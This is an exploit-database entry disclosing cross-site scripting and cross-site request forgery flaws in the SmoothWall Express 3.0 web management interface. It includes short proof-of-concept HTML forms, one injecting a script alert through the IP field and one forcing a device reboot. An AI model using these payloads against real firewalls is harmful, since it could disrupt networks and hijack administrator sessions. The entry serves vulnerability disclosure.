SmoothWall Express 3.0 Multiple Vulnerabilities

ID 1337DAY-ID-15314
Type zdt
Reporter dave b
Modified 2011-01-18T00:00:00


Exploit for cgi platform in category web applications

                                            The web management interface of SmoothWall Express 3.0 is vulnerable
to xss and csrf.
xss example:
<title> SmoothWall Express 3.0 xss </title>
 <form action=""; method="post"
        <input type="hidden" name="IP" value='"<script>alert(1);</script>'></input>
        <input type="hidden" name="ACTION" value='Run'></input>
csrf example:
<title>  SmoothWall Express 3.0 csrf </title>
 <form action="";
method="post" id="csrfplz">
        <input type="hidden" name="ACTION" value='Reboot'></input>

# [2018-02-17]  #